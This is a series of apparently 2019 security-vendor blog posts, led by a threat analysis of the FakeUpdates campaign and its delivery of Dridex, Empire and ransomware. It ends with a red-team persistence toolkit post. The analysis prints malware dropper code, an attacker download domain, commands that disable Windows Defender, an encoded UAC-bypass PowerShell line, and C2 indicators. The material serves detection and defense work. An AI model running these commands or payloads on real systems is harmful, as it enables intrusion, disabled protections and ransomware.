Since our April 2018 blog post, this campaign has been refined to include new techniques and the use of post-exploitation toolkits. Recent investigations have shown threat actor activity that included internal reconnaissance, credential harvesting, privilege escalation, lateral movement, and ransomware deployment in enterprise networks. FireEye has identified that a large number of the compromised sites serving up the first stage of FakeUpdates have been older, vulnerable Content Management System (CMS) applications.

You Are Using an Older Version…of our Malware

The FakeUpdates campaign begins with a rather intricate sequence of browser validation, performed before the final payload is downloaded. Injected code on the initial compromised page will make the user’s browser transparently navigate to a malicious website using hard-coded parameters. After victim browser information is gleaned, additional redirects are performed and the user is prompted to download a fake browser update. FireEye has observed that the browser validation sequence may have additional protections to evade sandbox detections and post-incident triage attempts on the compromise site(s).


Figure 2: Example of FakeUpdate landing page after HTTP redirects

The redirect process used numerous subdomains, with a limited number of IP addresses. The malicious subdomains are often changed in different parts of the initial redirects and browser validation stages.

After clicking the ‘Update’ button, we observed the downloading of one of three types of files:

  • Heavily-obfuscated HTML applications (.hta file extensions)
  • JavaScript files (.js file extensions)
  • ZIP-compressed JavaScript files (.zip extensions)

Figure 3 provides a snippet of JavaScript that provides the initial download functionality.

var domain = '//gnf6.ruscacademy[.]in/';
var statisticsRequest = 'wordpress/news.php?b=612626&m=ad2219689502f09c225b3ca0bfd8e333&y=206';
var statTypeParamName = 'st';

var filename = 'download.hta';
var browser = 'Chrome';
var special = '1';   
var filePlain = window.atob(file64);
var a = document.getElementById('buttonDownload');

Figure 3: Excerpts of JavaScript code identified from the FakeUpdates landing pages

When the user opens the initial FakeUpdates downloader, the Windows Scripting Host (wscript.exe) is executed and the following actions are performed:

  1. A script is executed in memory and used to fingerprint the affected system.
  2. A subsequent backdoor or banking trojan is downloaded if the system is successfully fingerprinted.
  3. A script is executed in memory which:
    • Downloads and launches a third party screenshot utility.
    • Sends the captured screenshots to an attacker.
  4. The payload delivered in step 2 is subsequently executed by the script process.

The backdoor and banking-trojan payloads described above have been identified as Dridex, NetSupport Manager RAT, AZOrult, and Chthonic malware. The strategy behind the selective payload delivery is unclear; however, the most prevalent malware delivered during this phase of the infection chain were variants of the Dridex backdoor.

FakeUpdates: More like FakeHTTP

After the end user executes the FakeUpdates download, the victim system will send a custom HTTP POST request to a hard-coded Command and Control (C2) server. The POST request, depicted in Figure 4, showed that the threat actors used a custom HTTP request for initial callback. The Age HTTP header, for example, was set to a string of 16 seemingly-random lowercase hexadecimal characters.


Figure 4: Initial HTTP communication after successful execution of the FakeUpdates dropper

The HTTP Age header typically represents the time in seconds since an object has been cached by a proxy. In this case, via analysis of the obfuscated code on disk, FireEye identified that the Age header correlates to a scripted “auth header” parameter; likely used by the C2 server to validate the request. The first HTTP POST request also contains an XOR-encoded HTTP payload variable “a=”.

The C2 server responds to the initial HTTP request with encoded JavaScript. When the code is decoded and subsequently executed, system and user information is collected using wscript.exe. The information collected from the victim system included:

  • The malicious script that initialized the callback
  • System hostname
  • Current user account
  • Active Directory domain
  • Hardware details, such as manufacturer
  • Anti-virus software details
  • Running processes

This activity is nearly identical to the steps observed in our April 2018 post, indicating only minor changes in data collection during this stage. For example, in the earlier iteration of this campaign, we did not observe the collection of the script responsible for the C2 communication. Following the system information gathering, the data is subsequently XOR-encoded and sent via another custom HTTP POST request request to the same C2 server, with the data included in the parameter “b=”. Figure 5 provides a snippet of sample of the second HTTP request.


Figure 5: Second HTTP POST request after successful system information gathering

Figure 6 provides a copy of the decoded content, showing the various data points the malware transmitted back to the C2 server.

0=500
1=C:\Users\User\AppData\Local\Temp\Chrome.js
2=AMD64
3=SYSTEM1
4=User
5=4
6=Windows_NT
7=DOMAIN
8=HP
9=HP EliteDesk
10=BIOS_VERSION
11=Windows Defender|Vendor Anti-Virus
12=Vendor Anti-Virus|Windows Defender|
13=00:00:00:00:00:00
14=Enhanced (101- or 102-key)
15=USB Input Device
16=1024x768
17=System Idle Process|System|smss.exe|csrss.exe|wininit.exe|csrss.exe| winlogon.exe|services.exe|lsass.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|
svchost.exe|spoolsv.exe|svchost.exe|svchost.exe|HPLaserJetService.exe|conhost.exe…

Figure 6: Decoded system information gathered by the FakeUpdates malware

After receiving the system information, the C2 server responds with an encoded payload delivered via chunked transfer-encoding to the infected system. This technique evades conventional IDS/IPS appliances, allowing for the second-stage payload to successfully download. During our investigations and FireEye Intelligence’s monitoring, we recovered encoded payloads that delivered one of the following:

  • Dridex (Figure 7)
  • NetSupport Manage Remote Access Tools (RATs) (Figure 8)
  • Chthonic or AZORult (Figure 9)
    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            wsh.Run('cmd /C rename "' + _tempFilePathSave + '" "' + execFileName + '"');
            WScript.Sleep(3 * 1000);
            runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 7: Code excerpt observed in FakeUpdates used to launch Dridex payloads

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            runFileResult = wsh.Run('"' + _tempFilePathExec + '" /verysilent');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 8: Code excerpt observed in FakeUpdates used to launch NetSupport payloads

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 9: Code excerpt observed in FakeUpdates used to launch Chthonic and AZORult payloads

During this process, the victim system downloads and executes nircmdc.exe, a utility specifically used during the infection process to save two system screenshots. Figure 10 provides an example command used to capture the desktop screenshots.

"C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot "C:\Users\User\AppData\Local\Temp\6206a2e3dc14a3d91.png"

Figure 10: Sample command used to executed the Nircmd tool to take desktop screenshots

The PNG screenshots of the infected systems are then transferred to the C2 server, after which they are deleted from the system. Figure 11 provides an example of a HTTP POST request, again with the custom Age and User-Agent headers.


Figure 11: Screenshots of the infected system are sent to an attacker-controlled C2

Interestingly, the screenshot file transfers were neither encoded nor obfuscated, as with other data elements transferred by the FakeUpdates malware. As soon as the screenshots are transferred, nircmdc.exe is deleted.

All Hands on Deck

In certain investigations, the incident was far from over. Following the distribution of Dridex v4 binaries (botnet IDs 199 and 501), new tools and frameworks began to appear. FireEye identified the threat actors leveraged their Dridex backdoor(s) to execute the publicly-available PowerShell Empire and/or Koadic post-exploitation frameworks. Managed Defense also identified the FakeUpdates to Dridex infection chain resulting in the download and execution of PoshC2, another publicly available tool. While it could be coincidental, it is worth noting that the use of PoshC2 was first observed in early September 2019 following the announcement that Empire would no longer be maintained and could represent a shift in attacker TTPs. These additional tools were often executed between 30 minutes and 2 hours after initial Dridex download. The pace of the initial phases of related attacks possibly suggests that automated post-compromise techniques are used in part before interactive operator activity occurs.

We identified extensive usage of Empire and C2 communication to various servers during these investigations. For example, via process tracking, we identified a Dridex-injected explorer.exe executing malicious PowerShell: a clear sign of an Empire stager:


Figure 12: An example of PowerShell Empire stager execution revealed during forensic analysis

In the above example, the threat actors instructed the victim system to use the remote server 185.122.59[.]78 for command-and-control using an out-of-the-box Empire agent C2 configuration for TLS-encrypted backdoor communications.

During their hands-on post-exploitation activity, the threat actors also moved laterally via PowerShell remoting and RDP sessions. FireEye identified the use of WMI to create remote PowerShell processes, subsequently used to execute Empire stagers on domain-joined systems. In one specific case, the time delta between initial Empire backdoor and successful lateral movement was under 15 minutes. Another primary goal for the threat actor was internal reconnaissance of both the local system and domain the computer was joined to. Figure 13 provides a snippet of Active Directory reconnaissance commands issued by the attacker during one of our investigations.


Figure 13: Attacker executed commands

The threat actors used an Empire module named SessionGopher and the venerable Mimikatz to harvest endpoint session and credential information. Finally, we also identified the attackers utilized Empire’s Invoke-EventVwrBypass, a Windows bypass technique used to launch executables using eventvwr.exe, as shown in Figure 14.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x


Figure 14: PowerShell event viewer bypass

Ransomware Attacks & Operator Tactics

Within these investigations, FireEye identified the deployment BitPaymer or DoppelPaymer ransomware. While these ransomware variants are highly similar, DoppelPaymer uses additional obfuscation techniques. It also has enhanced capabilities, including an updated network discovery mechanism and the requirement of specific command-line execution. DoppelPaymer also uses a different encryption and padding scheme.

The ransomware and additional reconnaissance tools were downloaded through public sharing website repositories such as DropMeFiles and SendSpace. Irrespective of the ransomware deployed, the attacker used the SysInternals utlity PSEXEC to distribute and execute the ransomware.  

Notably, in the DoppelPaymer incident, FireEye identified that Dridex v2 with the Botnet ID 12333 was downloaded onto the same system previously impacted by an instance of Dridex v4 with Botnet ID 501. Within days, this secondary Dridex instance was then used to enable the distribution of DoppelPaymer ransomware.  Prior to DoppelPaymer, the threat actor deleted volume shadow copies and disabled anti-virus and anti-malware protections on select systems. Event log artifacts revealed commands executed through PowerShell which were used to achieve this step (Figure 15):

Event Log

EID

Message

Microsoft-Windows-PowerShell%4Operational

600

 HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true

Microsoft-Windows-PowerShell%4Operational

600

 HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender

Application

1034

Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82.

Figure 15: Event log entries related to the uninstallation of AV agents and disablement of real-time monitoring

The DoppelPaymer ransomware was found in an Alternate Data Stream (ADS) in randomly named files on disk. ADSs are attributes within NTFS that allow for a file to have multiple data streams, with only the primary being visible in tools such as Windows Explorer. After ransomware execution, files are indicated as encrypted by being renamed with a “.locked” file extension. In addition to each “.locked” file, there is a ransom note with the file name “readme2unlock.txt” which provides instructions on how to decrypt files.


Figure 16: DoppelPaymer ransomware note observed observed during a Mandiant Incident Response investigation

Ransomware? Not In My House!

Over the past few years, we have seen ransomware graduate from a nuisance malware to one being used to extort victim networks out of significant sums of money. Furthermore, threat actors are now coupling ransomware with multiple toolkits or other malware families to gain stronger footholds into an environment. In this blog post alone, we witnessed a threat actor move through multiple toolsets - some automated, some manual - with the ultimate goal of holding the victim organization hostage.

Ransomware also raises the stakes for unprepared organizations as it levels the playing field for all areas of your enterprise. Ransomware proves that threat actors don’t need to get access to the most sensitive parts of your organization – they need to get access to the ones that will disrupt business processes. This widens your attack surface, but luckily, also gives you more opportunity for detection and response. Mandiant recently published an in depth white paper on Ransomware Protection and Containment Strategies, which may help organizations mitigate the risk of ransomware events.

Indicators

The following indicator set is a collective representation of artifacts identified during investigations into multiple customer compromises.

Type

Indicator(s)

FakeUpdates Files

0e470395b2de61f6d975c92dea899b4f

7503da20d1f83ec2ef2382ac13e238a8

102ae3b46ddcb3d1d947d4f56c9bf88c

aaca5e8e163503ff5fadb764433f8abb

2c444002be9847e38ec0da861f3a702b

62eaef72d9492a8c8d6112f250c7c4f2

175dcf0bd1674478fb7d82887a373174
10eefc485a42fac3b928f960a98dc451
a2ac7b9c0a049ceecc1f17022f16fdc6

FakeUpdates Domains & IP Addresses

<8-Characters>.green.mattingsolutions[.]co
<8-Characters>.www2.haciendarealhoa[.]com
<8-Characters>.user3.altcoinfan[.]com
93.95.100[.]178
130.0.233[.]178
185.243.115[.]84

gnf6.ruscacademy[.]in

backup.awarfaregaming[.]com

click.clickanalytics208[.]com

track.amishbrand[.]com

track.positiverefreshment[.]org

link.easycounter210[.]com

nircmdc.exe

8136d84d47cb62b4a4fe1f48eb64166e

Dridex

7239da273d3a3bfd8d169119670bb745

72fe19810a9089cd1ec3ac5ddda22d3f
07b0ce2dd0370392eedb0fc161c99dc7
c8bb08283e55aed151417a9ad1bc7ad9

6e05e84c7a993880409d7a0324c10e74

63d4834f453ffd63336f0851a9d4c632

0ef5c94779cd7861b5e872cd5e922311

Empire C2

185.122.59[.]78

109.94.110[.]136

Detecting the Techniques

FireEye detects this activity across our platforms, including named detections for Dridex, Empire, BitPaymer and DoppelPaymer Ransomware. As a result of these investigations, FireEye additionally deployed new indicators and signatures to Endpoint and Network Security appliances.  This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform

Signature Name

 

Endpoint Security

 

HX Exploit Detection
Empire RAT (BACKDOOR)
EVENTVWR PARENT PROCESS (METHODOLOGY)
Dridex (BACKDOOR)
Dridex A (BACKDOOR)
POWERSHELL SSL VERIFICATION DISABLE (METHODOLOGY)
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
FAKEUPDATES SCREENSHOT CAPTURE (METHODOLOGY)

Network Security

Backdoor.FAKEUPDATES
Trojan.Downloader.FakeUpdate
Exploit.Kit.FakeUpdate
Trojan.SSLCert.SocGholish

MITRE ATT&CK Technique Mapping

ATT&CK

Techniques

Initial Access

Drive-by Compromise (T1189), Exploit Public-Facing Application (T1190)

Execution

PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)

Persistence

DLL Search Order Hijacking (T1038)

Privilege Escalation

Bypass User Account Control (T1088), DLL Search Order Hijacking (T1038)

Defense Evasion

Bypass User Account Control (T1088), Disabling Security Tools (T1089), DLL Search Order Hijacking (T1038), File Deletion (T1107), Masquerading (T1036), NTFS File Attributes (T1096), Obfuscated Files or Information (T1027), Scripting (T1064), Virtualization/Sandbox Evasion (T1497)

Credential Access

Credential Dumping (T1003)

Discovery

Account Discovery (T1087), Domain Trust Discovery (T1482), File and Directory Discovery (T1083), Network Share Discovery (T1135), Process Discovery (T1057), Remote System Discovery (T1018), Security Software Discovery (T1063), System Information Discovery (T1082), System Network Configuration Discovery (T1016), Virtualization/Sandbox Evasion (T1497)

Lateral Movement

Remote Desktop Protocol (T1076),  Remote File Copy (T1105)

Collection

Data from Local System (T1005), Screen Capture (T1113)

Command And Control

Commonly Used Port (T1436), Custom Command and Control Protocol (T1094) ,Data Encoding (T1132), Data Obfuscation (T1001), Remote Access Tools (T1219), Remote File Copy (T1105), Standard Application Layer Protocol (T1071)

Exfiltration

Automated Exfiltration (T1020), Exfiltration Over Command and Control Channel (T1041)

Impact

Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490), Service Stop (T1489)

Acknowledgements

A huge thanks to James Wyke and Jeremy Kennelly for their analysis of this activity and support of this post.

The FireEye OT-CSIO: An Ontology to Understand, Cross-Compare, and Assess Operational Technology Cyber Security Incidents

The FireEye Operational Technology Cyber Security Incident Ontology (OT-CSIO)

While the number of threats to operational technology (OT) have significantly increased since the discovery of Stuxnet – driven by factors such as the growing convergence with information technology (IT) networks and the increasing availability of OT information, technology, software, and reference materials – we have observed only a small number of real-world OT-focused attacks. The limited sample size of well-documented OT attacks and lack of analysis from a macro level perspective represents a challenge for defenders and security leaders trying to make informed security decisions and risk assessments.

To help address this problem, FireEye Intelligence developed the OT Cyber Security Incident Ontology (OT-CSIO) to aid with communication with executives, and provide guidance for assessing risks. We highlight that the OT-CSIO focuses on high-level analysis and is not meant to provide in-depth insights into the nuances of each incident.

Our methodology evaluates four categories, which are targeting, impact, sophistication, and affected equipment architecture based on the Purdue Model (Table 7). Unlike other methodologies, such as MITRE's ATT&CK Matrix, FireEye Intelligence's OT-CSIO evaluates only the full aggregated attack lifecycle and the ultimate impacts. It does not describe the tactics, techniques, and procedures (TTPs) implemented at each step of the incident. Table 1 describes the four categories. Detailed information about each class is provided in Appendix 1.


Table 1: Categories for FireEye Intelligence's OT-CSIO

The OT-CSIO In Action

In Table 2 we list nine real-world incidents impacting OT systems categorized according to our ontology. We highlight that the ontology only reflects the ultimate impact of an incident, and it does not account for every step throughout the attack lifecycle. As a note, we cite public sources where possible, but reporting on some incidents is available to FireEye Threat Intelligence customers only.

Incident

Target

Sophistication

Impact

Impacted Equipment

Maroochy Shire Sewage Spill

(2000)

ICS-targeted

Medium

Disruption

Zone 3

Stuxnet

(2011)

ICS-targeted

High

Destruction

Zones 1-2

Shamoon

(2012)

ICS-targeted

Low

Destruction

Zone 4-5

Ukraine Power Outage

(2015)

ICS-targeted

Medium

Disruption, Destruction

Zone 2

Ukraine Power Outage

(2016)

ICS-targeted

High

Disruption

Zones 0-3

WannaCry Infection on HMIs

(2017)

Non-targeted

Low

Disruption

Zone 2-3

TEMP.Isotope Reconnaissance Campaign

(2017)

ICS-targeted

Low

Data Theft

Zones 2-4

TRITON Attack

(2017)

ICS-targeted

High

Disruption (likely building destructive capability)

Zone Safety, 1-5

Cryptomining Malware on European Water Utility

(2018)

Non-targeted

Low

Degradation

Zone 2/3

Financially Motivated Threat Actor Accesses HMI While Searching for POS Systems

(2019)

Non-targeted

Low

Compromise

Zone 2/3

Portable Executable File Infecting Malware Impacting Windows-based OT assets

(2019)

Non-targeted

Low

Degradation

Zone 2-3

Table 2: Categorized samples using the OT-CSIO

The OT-CSIO Matrix Facilitates Risk Management and Analysis

Risk management for OT cyber security is currently a big challenge given the difficulty of assessing and communicating the implications of high-impact, low-frequency events. Additionally, multiple risk assessment methodologies rely on background information to determine case scenarios. However, the quality of this type of analysis depends on the background information that is applied to develop the models or identify attack vectors. Taking this into consideration, the following matrix provides a baseline of incidents that can be used to learn about past cases and facilitate strategic analysis about future case scenarios for attacks that remain unseen, but feasible.


Table 3: The FireEye OT-CSIO Matrix

As Table 3 illustrates, we have only identified examples for a limited set of OT cyber security incident types. Additionally, some cases are very unlikely to occur. For example, medium- and high-sophistication non-targeted incidents remain unseen, even if feasible. Similarly, medium- and high-sophistication data compromises on OT may remain undetected. While this type of activity may be common, data compromises are often just a component of the attack lifecycle, rather than an end goal.

How to Use the OT-CSIO Matrix

The OT-CSIO Matrix presents multiple benefits for the assessment of OT threats from a macro level perspective given that it categorizes different types of incidents and invites further analysis on cases that have not yet been documented but may still represent a risk to organizations. We provide some examples on how to use this ontology:

  • Classify different types of attacks and develop cross-case analysis to identify differences and similarities. Knowledge about past incidents can be helpful to prevent similar scenarios and to think about threats that have not been evaluated by an organization.
  • Leverage the FireEye OT-CSIO Matrix for communication with executives by sharing a visual representation of different types of threats, their sophistication and possible impacts. This tool can make it easier to communicate risk despite the limited data available for high-impact, low-frequency events. The ontology provides an alternative to assess risk for different types of incidents based on the analysis of sophistication and impact, where increased sophistication and impact generally equates to higher risk.
  • Develop additional case scenarios to foresee threats that have not been observed yet but may become relevant in the future. Use this information as support while working on risk assessments.

Outlook

FireEye Intelligence's OT-CSIO seeks to compile complex incidents into practical diagrams that facilitate communication and analysis. Categorizing these events is useful for visualizing the full threat landscape, gaining knowledge about previously documented incidents, and considering alternative scenarios that have not yet been seen in the wild. Given that the field of OT cyber security is still developing, and the number of well-documented incidents is still low, categorization represents an opportunity to grasp tendencies and ultimately identify security gaps.

Appendix 1: OT-CSIO Class Definitions

Target

This category comprises cyber incidents that target industrial control systems (ICS) and non-targeted incidents that collaterally or coincidentally impact ICS, such as ransomware.


Table 4: Target category

Sophistication

Sophistication refers to the technical and operational sophistication of attacks. There are three levels of sophistication, which are determined by the analyst based on the following criteria.


Table 5: Sophistication category

Impact

The ontology reflects impact on the process or systems, not the resulting environmental impacts. There are five classes in this category, including data compromise, data theft, degradation, disruption, and destruction.


Table 6: Impact category

Impacted Equipment

This category is divided based on FireEye Intelligence's adaptation of the Purdue Model. For the purpose of this ontology, we add an additional zone for safety systems.


Table 7: Impacted equipment

Open Document format creates twist in maldoc landscape

By Warren Mercer and Paul Rascagneres.

Introduction

Cisco Talos recently observed attackers changing the file formats they use in an attempt to thwart common antivirus engines. This can happen across other file formats, but today, we are showing a change of approach for an actor who has deemed antivirus engines perhaps “too good” at detecting macro-based infection vectors.  We’ve noticed that the OpenDocument (ODT) file format for some Office applications can be used to bypass these detections. ODT is a ZIP archive with XML-based files used by Microsoft Office, as well as the comparable Apache OpenOffice and LibreOffice software.

There have recently been multiple malware campaigns using this file type that are able to avoid antivirus detection, due to the fact that these engines view ODT files as standard archives and don’t apply the same rules it normally would for an Office document. We also identified several sandboxes that fail to analyze ODT documents, as it is considered an archive, and the sandbox won’t open the document as a Microsoft Office file. Because of this, an attacker can use ODT files to deliver malware that would normally get blocked by traditional antivirus software.

We only found a few samples where this file format was used. The majority of these campaigns using malicious documents still rely on the Microsoft Office file format, but these cases show that the ODT file format could be used in the future at a more successful rate. In this blog post, we’ll walk through three cases of OpenDocument usage. The two first cases targets Microsoft Office, while the third one targets only OpenOffice and LibreOffice users. We do not know at this time if these samples were used simply for testing or a more malicious context.

Read more at Talosintelligence.com

2019 Flare-On Challenge Solutions

We are pleased to announce the conclusion of the sixth annual Flare-On Challenge. The popularity of this event continues to grow and this year we saw a record number of players as well as finishers. We will break down the numbers later in the post, but right now let’s look at the fun stuff: the prize! Each of the 308 dedicated and amazing players that finished our marathon of reverse engineering this year will receive a medal. These hard-earned awards will be shipping soon. Incidentally, the number of finishers smashed our estimates, so we have had to order more prizes.

We would like to thank the challenge authors individually for their great puzzles and solutions.

  1. Memecat Battlestation: Nick Harbour (@nickaharbour)
  2. Overlong: Eamon Walsh
  3. FlareBear: Mortiz Raabe (@m_r_tz)
  4. DnsChess: Eamon Walsh
  5. 4k demo: Christopher Gardner (@t00manybananas)
  6. Bmphide: Tyler Dean (@spresec)
  7. Wopr: Sandor Nemes (@sandornemes)
  8. Snake: Alex Rich (@AlexRRich)
  9. Reloaderd: Sebastian Vogl
  10. MugatuWare: Blaine Stancill (@MalwareMechanic)
  11. vv_max: Dhanesh Kizhakkinan (@dhanesh_k)
  12. help: Ryan Warns (@NOPAndRoll)

And now for the stats. As of 10:00am ET, participation was at an all-time high, with 5,790 players registered and 3,228 finishing at least one challenge. This year had the most finishers ever with 308 players completing all twelve challenges.

The U.S. reclaimed the top spot of total finishers with 29. Singapore strengthened its already unbelievable position of per-capita top Flare-On finishing country with one Flare-On finisher per every 224,000 persons living in Singapore. Rounding out the top five are the consistent high-finishing countries of Vietnam, Russia, and China.

 

All the binaries from this year’s challenge are now posted on the Flare-On website. Here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11
  12. SOLUTION #12

Threat Roundup for September 20 to September 27

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sep. 20 to Sep 27. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU272019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Open Sourcing StringSifter

Malware analysts routinely use the Strings program during static analysis in order to inspect a binary's printable characters. However, identifying relevant strings by hand is time consuming and prone to human error. Larger binaries produce upwards of thousands of strings that can quickly evoke analyst fatigue, relevant strings occur less often than irrelevant ones, and the definition of "relevant" can vary significantly among analysts. Mistakes can lead to missed clues that would have reduced overall time spent performing malware analysis, or even worse, incomplete or incorrect investigatory conclusions.

Earlier this year, the FireEye Data Science (FDS) and FireEye Labs Reverse Engineering (FLARE) teams published a blog post describing a machine learning model that automatically ranked strings to address these concerns. Today, we publicly release this model as part of StringSifter, a utility that identifies and prioritizes strings according to their relevance for malware analysis.

Goals

StringSifter is built to sit downstream from the Strings program; it takes a list of strings as input and returns those same strings ranked according to their relevance for malware analysis as output. It is intended to make an analyst's life easier, allowing them to focus their attention on only the most relevant strings located towards the top of its predicted output. StringSifter is designed to be seamlessly plugged into a user’s existing malware analysis stack. Once its GitHub repository is cloned and installed locally, it can be conveniently invoked from the command line with its default arguments according to:

strings <sample_of_interest> | rank_strings

We are also providing Docker command line tools for additional portability and usability. For a more detailed overview of how to use StringSifter, including how to specify optional arguments for customizable functionality, please view its README file on GitHub.

We have received great initial internal feedback about StringSifter from FireEye’s reverse engineers, SOC analysts, red teamers, and incident responders. Encouragingly, we have also observed users at the opposite ends of the experience spectrum find the tool to be useful – from beginners detonating their first piece of malware as part of a FireEye training course – to expert malware researchers triaging incoming samples on the front lines. By making StringSifter publicly available, we hope to enable a broad set of personas, use cases, and creative downstream applications. We will also welcome external contributions to help improve the tool’s accuracy and utility in future releases.

Conclusion

We are releasing StringSifter to coincide with our presentation at DerbyCon 2019 on Sept. 7, and we will also be doing a technical dive into the model at the Conference on Applied Machine Learning for Information Security this October. With its release, StringSifter will join FLARE VM, FakeNet, and CommandoVM as one of many recent malware analysis tools that FireEye has chosen to make publicly available. If you are interested in developing data-driven tools that make it easier to find evil and help benefit the security community, please consider joining the FDS or FLARE teams by applying to one of our job openings.

Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment

Ransomware is a global threat targeting organizations in all industries. The impact of a successful ransomware event can be material to an organization - including the loss of access to data, systems, and operational outages. The potential downtime, coupled with unforeseen expenses for restoration, recovery, and implementation of new security processes and controls can be overwhelming. Ransomware has become an increasingly popular choice for attackers over the past few years, and it’s easy to understand why given how simple it is to leverage in campaigns – while offering a healthy financial return for attackers.

In our latest report, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment, we discuss steps organizations can proactively take to harden their environment to prevent the downstream impact of a ransomware event. These recommendations can also help organizations with prioritizing the most important steps required to contain and minimize the impact of a ransomware event after it occurs.

Ransomware is commonly deployed across an environment in two ways:

  1. Manual propagation by a threat actor after they’ve penetrated an environment and have administrator-level privileges broadly across the environment:
    • Manually run encryptors on targeted systems.
    • Deploy encryptors across the environment using Windows batch files (mount C$ shares, copy the encryptor, and execute it with the Microsoft PsExec tool).
    • Deploy encryptors with Microsoft Group Policy Objects (GPOs).
    • Deploy encryptors with existing software deployment tools utilized by the victim organization.
  2. Automated propagation:
    • Credential or Windows token extraction from disk or memory.
    • Trust relationships between systems – and leveraging methods such as Windows Management Instrumentation (WMI), SMB, or PsExec to bind to systems and execute payloads.
    • Unpatched exploitation methods (e.g., EternalBlue – addressed via Microsoft Security Bulletin MS17-010).

The report covers several technical recommendations to help organizations mitigate the risk of and contain ransomware events including:

  • Endpoint segmentation
  • Hardening against common exploitation methods
  • Reducing the exposure of privileged and service accounts
  • Cleartext password protections

If you are reading this report to aid your organization’s response to an existing ransomware event, it is important to understand how the ransomware was deployed through the environment and design your ransomware response appropriately. This guide should help organizations in that process.

Read the report today.

*Note: The recommendations in this report will help organizations mitigate the risk of and contain ransomware events. However, this report does not cover all aspects of a ransomware incident response. We do not discuss investigative techniques to identify and remove backdoors (ransomware operators often have multiple backdoors into victim environments), communicating and negotiating with threat actors, or recovering data once a decryptor is provided.

SharPersist: Windows Persistence Toolkit in C#

Background

PowerShell has been used by the offensive community for several years now but recent advances in the defensive security industry are causing offensive toolkits to migrate from PowerShell to reflective C# to evade modern security products. Some of these advancements include Script Block Logging, Antimalware Scripting Interface (AMSI), and the development of signatures for malicious PowerShell activity by third-party security vendors. Several public C# toolkits such as Seatbelt, SharpUp and SharpView have been released to assist with tasks in various phases of the attack lifecycle. One phase of the attack lifecycle that has been missing a C# toolkit is persistence. This post will talk about a new Windows Persistence Toolkit created by FireEye Mandiant’s Red Team called SharPersist.

Windows Persistence

During a Red Team engagement, a lot of time and effort is spent gaining initial access to an organization, so it is vital that the access is maintained in a reliable manner. Therefore, persistence is a key component in the attack lifecycle, shown in Figure 1.


Figure 1: FireEye Attack Lifecycle Diagram

Once an attacker establishes persistence on a system, the attacker will have continual access to the system after any power loss, reboots, or network interference. This allows an attacker to lay dormant on a network for extended periods of time, whether it be weeks, months, or even years. There are two key components of establishing persistence: the persistence implant and the persistence trigger, shown in Figure 2. The persistence implant is the malicious payload, such as an executable (EXE), HTML Application (HTA), dynamic link library (DLL), or some other form of code execution. The persistence trigger is what will cause the payload to execute, such as a scheduled task or Windows service. There are several known persistence triggers that can be used on Windows, such as Windows services, scheduled tasks, registry, and startup folder, and there continues to be more discovered. For a more thorough list, see the MITRE ATT&CK persistence page.


Figure 2: Persistence equation

SharPersist Overview

SharPersist was created in order to assist with establishing persistence on Windows operating systems using a multitude of different techniques. It is a command line tool written in C# which can be reflectively loaded with Cobalt Strike’s “execute-assembly” functionality or any other framework that supports the reflective loading of .NET assemblies. SharPersist was designed to be modular to allow new persistence techniques to be added in the future. There are also several items related to tradecraft that have been built-in to the tool and its supported persistence techniques, such as file time stomping and running applications minimized or hidden.

SharPersist and all associated usage documentation can be found at the SharPersist FireEye GitHub page.

SharPersist Persistence Techniques

There are several persistence techniques that are supported in SharPersist at the time of this blog post. A full list of these techniques and their required privileges is shown in Figure 3.

Technique

Description

Technique Switch Name (-t)

Admin Privileges Required?

Touches Registry?

Adds/Modifies Files on Disk?

KeePass

Backdoor KeePass configuration file

keepass

No

No

Yes

New Scheduled Task

Creates new scheduled task

schtask

No

No

Yes

New Windows Service

Creates new Windows service

service

Yes

Yes

No

Registry

Registry key/value creation/modification

reg

No

Yes

No

Scheduled Task Backdoor

Backdoors existing scheduled task with additional action

schtaskbackdoor

Yes

No

Yes

Startup Folder

Creates LNK file in user startup folder

